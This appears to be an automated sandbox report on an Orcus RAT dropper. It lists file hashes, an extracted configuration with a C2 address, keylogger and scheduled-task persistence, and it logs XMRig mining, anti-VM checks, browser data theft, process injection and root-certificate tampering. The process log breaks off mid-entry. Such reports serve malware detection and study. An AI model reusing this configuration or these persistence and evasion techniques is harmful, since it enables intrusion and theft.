Analysis
-
max time kernel
141s -
max time network
188s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
17-07-2021 07:52
Static task
static1
Behavioral task
behavioral1
Sample
a71f91351dc1bb57f0426080f2c03854.exe
Resource
win7v20210410
General
-
Target
a71f91351dc1bb57f0426080f2c03854.exe
-
Size
8.4MB
-
MD5
a71f91351dc1bb57f0426080f2c03854
-
SHA1
a336bd9298b0772f4d5764f695335fc7ef99755b
-
SHA256
f95e19a66cb1e3a612f2c07380376196e856dfefbe1038c4e6fd7d6a03388b5d
-
SHA512
dff5db2f6b3af11d10cb25c6e9df6df5bd4668ff54ba4ff1b6456ee7ab338e59297bad4d8722e7da15d175eabcd5833a632e5d62970d04993c733c379b7f4d19
Malware Config
Extracted
orcus
NewVPREFinal
67.242.2.35:10134
8185e643b7514e15b8dcfc7df7a8733b
-
autostart_method
TaskScheduler
-
enable_keylogger
true
-
install_path
%systemroot%\lsddsds\lsdds.exe
-
reconnect_delay
10000
-
registry_keyname
lsd
-
taskscheduler_taskname
lsdds
-
watchdog_path
Temp\olsdd.exe
Signatures
-
Orcus Main Payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe family_orcus C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe family_orcus \Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe family_orcus -
Looks for VirtualBox Guest Additions in registry 2 TTPs
-
Orcurs Rat Executable 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe orcus C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe orcus \Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe orcus -
XMRig Miner Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1504-302-0x00000001402EB66C-mapping.dmp xmrig -
Executes dropped EXE 20 IoCs
Processes:
python.exedcbl.exeex.exeec.exefrefef.exeVu.exepython.exeObus.exedefendernottray.exetrayfontdefender.exesihost64.exesihost32.exeWindowsInput.exeWindowsInput.exelsdds.exelsdds.exeolsdd.exeolsdd.exeasasasas.exedefendernottray.exepid process 1748 python.exe 1196 dcbl.exe 1328 ex.exe 1340 ec.exe 1492 frefef.exe 1512 Vu.exe 1740 python.exe 820 Obus.exe 2956 defendernottray.exe 2996 trayfontdefender.exe 2948 sihost64.exe 2180 sihost32.exe 1572 WindowsInput.exe 1140 WindowsInput.exe 2416 lsdds.exe 2692 lsdds.exe 2280 olsdd.exe 1888 olsdd.exe 1520 asasasas.exe 2376 defendernottray.exe -
Looks for VMWare Tools registry key 2 TTPs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
frefef.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion frefef.exe -
Loads dropped DLL 16 IoCs
Processes:
a71f91351dc1bb57f0426080f2c03854.exepython.exepython.exeex.exeec.exedefendernottray.exetrayfontdefender.exeolsdd.execmd.exesihost64.exepid process 1304 a71f91351dc1bb57f0426080f2c03854.exe 1304 a71f91351dc1bb57f0426080f2c03854.exe 1304 a71f91351dc1bb57f0426080f2c03854.exe 1304 a71f91351dc1bb57f0426080f2c03854.exe 1304 a71f91351dc1bb57f0426080f2c03854.exe 1304 a71f91351dc1bb57f0426080f2c03854.exe 1748 python.exe 1304 a71f91351dc1bb57f0426080f2c03854.exe 1740 python.exe 1328 ex.exe 1340 ec.exe 2956 defendernottray.exe 2996 trayfontdefender.exe 2280 olsdd.exe 2068 cmd.exe 2948 sihost64.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 9 ip-api.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
frefef.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum frefef.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 frefef.exe -
Drops file in System32 directory 22 IoCs
Processes:
defendernottray.exetrayfontdefender.exeObus.exesihost64.exeec.exeex.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWindowsInput.exepowershell.exepowershell.exepowershell.exedescription ioc process File created \??\c:\windows\system32\microsoft\libs\sihost64.exe defendernottray.exe File created \??\c:\windows\system32\microsoft\telemetry\sihost32.exe trayfontdefender.exe File created C:\Windows\SysWOW64\WindowsInput.exe.config Obus.exe File opened for modification \??\c:\windows\system32\defendernottray.exe sihost64.exe File opened for modification \??\c:\windows\system32\trayfontdefender.exe ec.exe File opened for modification \??\c:\windows\system32\defendernottray.exe ex.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created \??\c:\windows\system32\microsoft\telemetry\sihost32.log trayfontdefender.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created \??\c:\windows\system32\trayfontdefender.exe ec.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created \??\c:\windows\system32\microsoft\libs\sihost64.log defendernottray.exe File created C:\Windows\SysWOW64\WindowsInput.exe Obus.exe File created C:\Windows\SysWOW64\WindowsInput.InstallState WindowsInput.exe File created \??\c:\windows\system32\defendernottray.exe ex.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created \??\c:\windows\system32\microsoft\libs\WR64.sys defendernottray.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
defendernottray.exedescription pid process target process PID 2956 set thread context of 1504 2956 defendernottray.exe explorer.exe -
Drops file in Windows directory 3 IoCs
Processes:
Obus.exedescription ioc process File created C:\Windows\lsddsds\lsdds.exe Obus.exe File opened for modification C:\Windows\lsddsds\lsdds.exe Obus.exe File created C:\Windows\lsddsds\lsdds.exe.config Obus.exe -
Detects Pyinstaller 5 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\python\python.exe pyinstaller C:\Users\Admin\AppData\Local\Temp\python\python.exe pyinstaller C:\Users\Admin\AppData\Local\Temp\python\python.exe pyinstaller \Users\Admin\AppData\Local\Temp\python\python.exe pyinstaller C:\Users\Admin\AppData\Local\Temp\python\python.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1620 1492 WerFault.exe frefef.exe -
Checks SCSI registry key(s) 3 TTPs 1 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
frefef.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S frefef.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
frefef.exeVu.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString frefef.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Vu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Vu.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 frefef.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2416 schtasks.exe 2828 schtasks.exe 2884 schtasks.exe 2912 schtasks.exe 2916 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2448 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
frefef.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation frefef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer frefef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName frefef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 frefef.exe -
Processes:
defendernottray.exefrefef.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a defendernottray.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 frefef.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 frefef.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 defendernottray.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a defendernottray.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a defendernottray.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exeVu.exepowershell.exepowershell.exeec.exeex.exepowershell.exepowershell.exepowershell.exepowershell.exeWerFault.exepowershell.exepowershell.exedefendernottray.exetrayfontdefender.execmd.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeolsdd.exelsdds.exedcbl.exepid process 796 powershell.exe 1880 powershell.exe 796 powershell.exe 1880 powershell.exe 1512 Vu.exe 1512 Vu.exe 1512 Vu.exe 2536 powershell.exe 2636 powershell.exe 2536 powershell.exe 2636 powershell.exe 1340 ec.exe 1328 ex.exe 2216 powershell.exe 1824 powershell.exe 2216 powershell.exe 1824 powershell.exe 1136 powershell.exe 2172 powershell.exe 1136 powershell.exe 1620 WerFault.exe 1620 WerFault.exe 1620 WerFault.exe 1620 WerFault.exe 1620 WerFault.exe 1620 WerFault.exe 1620 WerFault.exe 2172 powershell.exe 2840 powershell.exe 2856 powershell.exe 2840 powershell.exe 2956 defendernottray.exe 2856 powershell.exe 2996 trayfontdefender.exe 2068 cmd.exe 2068 cmd.exe 2240 powershell.exe 2240 powershell.exe 2316 powershell.exe 2604 powershell.exe 2316 powershell.exe 2604 powershell.exe 2800 powershell.exe 2624 powershell.exe 2800 powershell.exe 2624 powershell.exe 1888 olsdd.exe 1888 olsdd.exe 2416 lsdds.exe 2416 lsdds.exe 2416 lsdds.exe 1888 olsdd.exe 2416 lsdds.exe 1888 olsdd.exe 2416 lsdds.exe 1888 olsdd.exe 1196 dcbl.exe 2416 lsdds.exe 1888 olsdd.exe 2416 lsdds.exe 1888 olsdd.exe 2416 lsdds.exe 1888 olsdd.exe 2416 lsdds.exe -
Suspicious use of AdjustPrivilegeToken 32 IoCs
Processes:
Vu.exefrefef.exepowershell.exepowershell.exepowershell.exepowershell.exeec.exeex.exepowershell.exepowershell.exepowershell.exepowershell.exeWerFault.exepowershell.exepowershell.exedefendernottray.exetrayfontdefender.execmd.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeexplorer.exelsdds.exeolsdd.exeolsdd.exedcbl.exeasasasas.exepowershell.exedescription pid process Token: SeDebugPrivilege 1512 Vu.exe Token: SeDebugPrivilege 1492 frefef.exe Token: SeDebugPrivilege 796 powershell.exe Token: SeDebugPrivilege 1880 powershell.exe Token: SeDebugPrivilege 2536 powershell.exe Token: SeDebugPrivilege 2636 powershell.exe Token: SeDebugPrivilege 1340 ec.exe Token: SeDebugPrivilege 1328 ex.exe Token: SeDebugPrivilege 2216 powershell.exe Token: SeDebugPrivilege 1824 powershell.exe Token: SeDebugPrivilege 1136 powershell.exe Token: SeDebugPrivilege 2172 powershell.exe Token: SeDebugPrivilege 1620 WerFault.exe Token: SeDebugPrivilege 2840 powershell.exe Token: SeDebugPrivilege 2856 powershell.exe Token: SeDebugPrivilege 2956 defendernottray.exe Token: SeDebugPrivilege 2996 trayfontdefender.exe Token: SeDebugPrivilege 2068 cmd.exe Token: SeDebugPrivilege 2240 powershell.exe Token: SeDebugPrivilege 2316 powershell.exe Token: SeDebugPrivilege 2604 powershell.exe Token: SeDebugPrivilege 2800 powershell.exe Token: SeDebugPrivilege 2624 powershell.exe Token: SeLockMemoryPrivilege 1504 explorer.exe Token: SeLockMemoryPrivilege 1504 explorer.exe Token: SeDebugPrivilege 2416 lsdds.exe Token: SeDebugPrivilege 2280 olsdd.exe Token: SeDebugPrivilege 1888 olsdd.exe Token: SeDebugPrivilege 1196 dcbl.exe Token: SeDebugPrivilege 1520 asasasas.exe Token: SeDebugPrivilege 1520 asasasas.exe Token: SeDebugPrivilege 2304 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
lsdds.exepid process 2416 lsdds.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
lsdds.exepid process 2416 lsdds.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
lsdds.exepid process 2416 lsdds.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a71f91351dc1bb57f0426080f2c03854.exepython.exeex.exeec.execmd.execmd.exeVu.exepowershell.execmd.exedescription pid process target process PID 1304 wrote to memory of 1748 1304 a71f91351dc1bb57f0426080f2c03854.exe python.exe PID 1304 wrote to memory of 1748 1304 a71f91351dc1bb57f0426080f2c03854.exe python.exe PID 1304 wrote to memory of 1748 1304 a71f91351dc1bb57f0426080f2c03854.exe python.exe PID 1304 wrote to memory of 1748 1304 a71f91351dc1bb57f0426080f2c03854.exe python.exe PID 1304 wrote to memory of 1196 1304 a71f91351dc1bb57f0426080f2c03854.exe dcbl.exe PID 1304 wrote to memory of 1196 1304 a71f91351dc1bb57f0426080f2c03854.exe dcbl.exe PID 1304 wrote to memory of 1196 1304 a71f91351dc1bb57f0426080f2c03854.exe dcbl.exe PID 1304 wrote to memory of 1196 1304 a71f91351dc1bb57f0426080f2c03854.exe dcbl.exe PID 1304 wrote to memory of 1328 1304 a71f91351dc1bb57f0426080f2c03854.exe ex.exe PID 1304 wrote to memory of 1328 1304 a71f91351dc1bb57f0426080f2c03854.exe ex.exe PID 1304 wrote to memory of 1328 1304 a71f91351dc1bb57f0426080f2c03854.exe ex.exe PID 1304 wrote to memory of 1328 1304 a71f91351dc1bb57f0426080f2c03854.exe ex.exe PID 1304 wrote to memory of 1340 1304 a71f91351dc1bb57f0426080f2c03854.exe ec.exe PID 1304 wrote to memory of 1340 1304 a71f91351dc1bb57f0426080f2c03854.exe ec.exe PID 1304 wrote to memory of 1340 1304 a71f91351dc1bb57f0426080f2c03854.exe ec.exe PID 1304 wrote to memory of 1340 1304 a71f91351dc1bb57f0426080f2c03854.exe ec.exe PID 1304 wrote to memory of 1492 1304 a71f91351dc1bb57f0426080f2c03854.exe frefef.exe PID 1304 wrote to memory of 1492 1304 a71f91351dc1bb57f0426080f2c03854.exe frefef.exe PID 1304 wrote to memory of 1492 1304 a71f91351dc1bb57f0426080f2c03854.exe frefef.exe PID 1304 wrote to memory of 1492 1304 a71f91351dc1bb57f0426080f2c03854.exe frefef.exe PID 1304 wrote to memory of 1512 1304 a71f91351dc1bb57f0426080f2c03854.exe Vu.exe PID 1304 wrote to memory of 1512 1304 a71f91351dc1bb57f0426080f2c03854.exe Vu.exe PID 1304 wrote to memory of 1512 1304 a71f91351dc1bb57f0426080f2c03854.exe Vu.exe PID 1304 wrote to memory of 1512 1304 a71f91351dc1bb57f0426080f2c03854.exe Vu.exe PID 1748 wrote to memory of 1740 1748 python.exe python.exe PID 1748 wrote to memory of 1740 1748 python.exe python.exe PID 1748 wrote to memory of 1740 1748 python.exe python.exe PID 1304 wrote to memory of 820 1304 a71f91351dc1bb57f0426080f2c03854.exe Obus.exe PID 1304 wrote to memory of 820 1304 a71f91351dc1bb57f0426080f2c03854.exe Obus.exe PID 1304 wrote to memory of 820 1304 a71f91351dc1bb57f0426080f2c03854.exe Obus.exe PID 1304 wrote to memory of 820 1304 a71f91351dc1bb57f0426080f2c03854.exe Obus.exe PID 1328 wrote to memory of 864 1328 ex.exe cmd.exe PID 1328 wrote to memory of 864 1328 ex.exe cmd.exe PID 1328 wrote to memory of 864 1328 ex.exe cmd.exe PID 1340 wrote to memory of 324 1340 ec.exe cmd.exe PID 1340 wrote to memory of 324 1340 ec.exe cmd.exe PID 1340 wrote to memory of 324 1340 ec.exe cmd.exe PID 864 wrote to memory of 1880 864 cmd.exe powershell.exe PID 864 wrote to memory of 1880 864 cmd.exe powershell.exe PID 864 wrote to memory of 1880 864 cmd.exe powershell.exe PID 324 wrote to memory of 796 324 cmd.exe powershell.exe PID 324 wrote to memory of 796 324 cmd.exe powershell.exe PID 324 wrote to memory of 796 324 cmd.exe powershell.exe PID 1512 wrote to memory of 2172 1512 Vu.exe powershell.exe PID 1512 wrote to memory of 2172 1512 Vu.exe powershell.exe PID 1512 wrote to memory of 2172 1512 Vu.exe powershell.exe PID 2172 wrote to memory of 2264 2172 powershell.exe cmd.exe PID 2172 wrote to memory of 2264 2172 powershell.exe cmd.exe PID 2172 wrote to memory of 2264 2172 powershell.exe cmd.exe PID 2172 wrote to memory of 2312 2172 powershell.exe netsh.exe PID 2172 wrote to memory of 2312 2172 powershell.exe netsh.exe PID 2172 wrote to memory of 2312 2172 powershell.exe netsh.exe PID 864 wrote to memory of 2536 864 cmd.exe powershell.exe PID 864 wrote to memory of 2536 864 cmd.exe powershell.exe PID 864 wrote to memory of 2536 864 cmd.exe powershell.exe PID 1512 wrote to memory of 2588 1512 Vu.exe cmd.exe PID 1512 wrote to memory of 2588 1512 